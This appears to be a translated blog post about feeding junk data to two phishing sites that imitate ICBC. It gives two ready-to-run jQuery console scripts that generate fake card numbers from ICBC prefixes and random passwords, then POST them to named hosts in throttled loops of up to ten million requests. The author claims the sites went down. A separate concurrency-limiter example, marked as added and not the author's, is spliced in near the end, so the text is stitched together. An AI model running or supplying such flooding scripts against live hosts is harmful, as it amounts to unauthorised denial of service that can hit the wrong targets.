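Last night, on the subway home from work, I received a text message. I saw it was not from ICBC and did not pay it much attention; it was none of my business.
But today, while browsing oschina, I saw a post from someone who had received much the same phishing message.
It looked like this:
At that point I could not stand by any longer. My interest was piqued, so what did I do?
I generated a large number of random ICBC card numbers and passwords and submitted them to the phishing sites.
(Random: so that the phisher cannot analyze and filter out the junk data.)
Both sites are currently unreachable~
By a rough count, at least 20,000 records were submitted to each site.
Now let me explain how I fed the phishers dead fish:
The phishing target is ICBC, so first I obtained ICBC's card-number prefixes.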
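OK, now everything is basically ready.
Language used: JavaScript
Reason: fast, fast, fast
First, analyze the parameters the site expects to be submitted:
Site in figure 1:
{id: site id, logonCardNum: card number, netType: password, randomId: verification code}
Here is the code: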
```javascript
// Requires jQuery ($) to be available on the page where this runs.

// Random 6-digit verification code.
function getAuthCode() {
    var len = 6, code = "";
    for (var i = 0; i < len; i++) {
        code += Math.floor(Math.random() * 10);
    }
    return code;
}

// Random 6-digit numeric password.
function getPwd() {
    var charPwd = "1234567890".split(""), pwdLen = 6, pwd = "";
    for (var i = 0; i < pwdLen; i++) {
        pwd += charPwd[Math.floor(Math.random() * charPwd.length)];
    }
    return pwd;
}

// Random card number: one of the ICBC prefixes followed by 13 random digits.
function getCard() {
    var charCard = [
        "370246","370248","370249","427010","427018","427019","427020","427029","427030","427039",
        "370247","438125","438126","451804","451810","451811","45806","458071","489734","489735",
        "489736","510529","427062","524091","427064","530970","53098","530990","558360","620200",
        "620302","620402","620403","620404","524047","620406","620407","525498","620409","620410",
        "620411","620412","620502","620503","620405","620408","620512","620602","620604","620607",
        "620611","620612","620704","620706","620707","620708","620709","620710","620609","620712",
        "620713","620714","620802","620711","620904","620905","621001","620902","621103","621105",
        "621106","621107","621102","621203","621204","621205","621206","621207","621208","621209",
        "621210","621302","621303","621202","621305","621306","621307","621309","621311","621313",
        "621211","621315","621304","621402","621404","621405","621406","621407","621408","621409",
        "621410","621502","621317","621511","621602","621603","621604","621605","621608","621609",
        "621610","621611","621612","621613","621614","621615","621616","621617","621607","621606",
        "621804","621807","621813","621814","621817","621901","621904","621905","621906","621907",
        "621908","621909","621910","621911","621912","621913","621915","622002","621903","622004",
        "622005","622006","622007","622008","622010","622011","622012","621914","622015","622016",
        "622003","622018","622019","622020","622102","622103","622104","622105","622013","622111",
        "622114","622200","622017","622202","622203","622208","622210","622211","622212","622213",
        "622214","622110","622220","622223","622225","622229","622230","622231","622232","622233",
        "622234","622235","622237","622215","622239","622240","622245","622224","622303","622304",
        "622305","622306","622307","622308","622309","622238","622314","622315","622317","622302",
        "622402","622403","622404","622313","622504","622505","622509","622513","622517","622502",
        "622604","622605","622606","622510","622703","622715","622806","622902","622903","622706",
        "623002","623006","623008","623011","623012","622904","623015","623100","623202","623301",
        "623400","623500","623602","623803","623901","623014","624100","624200","624301","624402",
        "624518","624518","624518","624580","624580","625309","623700","628288","624000","9558",
        "628286","622206","621225","526836","513685","543098","458441","620058","621281","622246",
        "900000","544210","548943","370267","621558","621559","621722","621723","620086","621226",
        "402791","427028","427038","548259","356879","356880","356881","356882","528856","621618",
        "620516","621227","621721","900010","625330","625331","625332","623062","622236","621670",
        "524374","550213","374738","374739","621288","625708","625709","622597","622599","360883",
        "360884","625865","625866","625899","625929","621376","620054","620142","621423","625927",
        "621428","625939","621434","625987","621761","621749","620184","625930","621300","621378",
        "625114","622159","621720","625021","625022","625932","621379","620114","620146","622889",
        "625900","622949","625915","625916","620030","620050","622944","625115","620101","623335",
        "622171","621240","621724","625931","621762","625918","625113","621371","620143","620149",
        "621730","625928","621414","625914","621375","620187","621734","621433","625986","621370",
        "625925","622926","622927","622928","622929","622930","622931","621733","621732","620124",
        "620183","620561","625116","622227","625921","621764","625926","621372","623034","625110",
        "621464","625942","622158","625917","621765","620094","620186","621719","625922","621369",
        "621763","625934","620046","621750","625933","621377","620148","620185","625920","621367",
        "625924","621374","621731","621781"
        ],
        cardLen = 19 - 6,
        card = "";
    card = charCard[Math.floor(Math.random() * charCard.length)];
    for (var i = 0; i < cardLen; i++) {
        card += Math.floor(Math.random() * 10);
    }
    return card;
}

// Send one record. Arguments passed by callers are ignored; they are
// evaluated only for their ++ side effects on the global counters.
function Submit() {
    var card = getCard(), pwd = getPwd(), code = getAuthCode(),
        sid = Math.floor(Math.random() * 3 + 1);
    $.ajax({
        type: "POST",
        url: "http://www.idagb.com/add_1.asp",
        data: {id: sid, logonCardNum: card, netType: pwd, randomId: code},
        async: true,
        success: function (data) {
            HandleResult(card);
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
            HandleResult(card);
        }
    });
}

// Called when a request finishes: show progress, release one slot,
// then start new requests until the limit is reached again.
function HandleResult(data) {
    $("body").html(i + " : " + data + " , {" + CurrentThread-- + "}");
    if (i < Count) {
        for (var j = 0; j < Thread; j++) {
            if (CurrentThread >= Thread || i >= Count) {
                break; // enforce the maximum thread count / maximum request count
            }
            Submit(i++, CurrentThread++);
        }
    }
}

var i = 0, Count = 10000000, Thread = 12, CurrentThread = 0;
Submit(i++, CurrentThread++); // first trigger: i and the thread counter must both be incremented
```
Site in figure 2:
{step: step, ukh: card number, umm: password, uid: visit id}
Here is the code:
```javascript
// Requires jQuery ($) to be available on the page where this runs.
// getPwd() and getCard() are identical to the functions in the script for
// the first site (same prefix array) and are not repeated here.

// Random 15-character visit id made of lowercase letters and digits.
function getUserId() {
    var charCode = "abcdefghijklmnopqrstuvwxyz1234567890".split(""),
        codeLen = 15, code = "";
    for (var i = 0; i < codeLen; i++) {
        code += charCode[Math.floor(Math.random() * charCode.length)];
    }
    return code;
}

// Send one record. Arguments passed by callers are ignored; they are
// evaluated only for their ++ side effects on the global counters.
function Submit() {
    var card = getCard(), pwd = getPwd(), uid = getUserId();
    $.ajax({
        type: "POST",
        url: "http://www.ibokn.com/Library.cgi4?uid=" + uid,
        data: {step: 1, ukh: card, umm: pwd, uid: uid},
        async: true,
        success: function (data) {
            HandleResult(card);
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
            HandleResult(card);
        }
    });
}

// Called when a request finishes: show progress, release one slot,
// then start new requests until the limit is reached again.
function HandleResult(data) {
    $("body").html(i + " : " + data + " , {" + CurrentThread-- + "}");
    if (i < Count) {
        for (var j = 0; j < Thread; j++) {
            if (CurrentThread >= Thread || i >= Count) {
                break; // enforce the maximum thread count / maximum request count
            }
            Submit(i++, CurrentThread++);
        }
    }
}

var i = 0, Count = 1000000, Thread = 12, CurrentThread = 0;
Submit(i++, CurrentThread++); // first trigger: i and the thread counter must both be incremented
```
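That's it: just inject it into the console and run it, and it keeps submitting dead fish to the phishing site in a loop~
Finally, let me share the method in this JavaScript that enforces a maximum number of threads: HandleResult
Why is this method needed?
Because when asynchronous ajax calls are issued in a loop, if you have 1 million POSTs they will all be fired at once. Your browser will certainly freeze,
so I added a method here that limits the number of submissions.
If you use synchronous requests instead, the submission speed is slow.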
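The throttling idea behind HandleResult, written as a stand-alone runner; this is an added example, not the original author's code. The names `runLimited`, `once` and `demo` are hypothetical, and the tasks are constructed placeholders that perform no network I/O. It also guards against a completion callback firing twice, which would otherwise corrupt the in-flight counter.

```javascript
// Wrap a callback so that a second invocation (for example both a success
// and an error handler firing) cannot release the same slot twice.
function once(fn) {
  var called = false;
  return function () {
    if (!called) { called = true; fn(); }
  };
}

// Run tasks (functions taking a `done` callback) with at most `limit` in flight.
function runLimited(tasks, limit, onAllDone) {
  var next = 0, inFlight = 0, finished = 0, peak = 0, pumping = false;

  function pump() {
    if (pumping) return; // a task finished synchronously; the outer loop carries on
    pumping = true;
    while (inFlight < limit && next < tasks.length) {
      inFlight++;
      peak = Math.max(peak, inFlight);
      tasks[next++](once(settle));
    }
    pumping = false;
    if (finished === tasks.length) onAllDone({ finished: finished, peak: peak });
  }

  function settle() {
    inFlight--;
    finished++;
    pump();
  }

  pump();
}

// Constructed tasks: each one parks its `done` callback so the demo
// controls when, and how often, it fires.
function demo() {
  var parked = [], started = [], result = null, tasks = [];
  for (var n = 0; n < 5; n++) {
    tasks.push(function (done) { parked.push(done); });
  }
  runLimited(tasks, 2, function (r) { result = r; });
  started.push(parked.length);  // only `limit` tasks have started
  parked[0]();                  // one completes, so one more starts
  parked[0]();                  // duplicate callback is ignored
  started.push(parked.length);
  for (var k = 1; k < parked.length; k++) parked[k](); // drain; list grows as tasks start
  return { started: started, result: result };
}
```

Unlike a synchronous loop, the runner never blocks: a new task starts only when a slot is released, so the number of pending callbacks stays bounded by `limit`.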
OK, that's all for my share~
Original article: http://www.cnblogs.com/ulon/p/4758194.html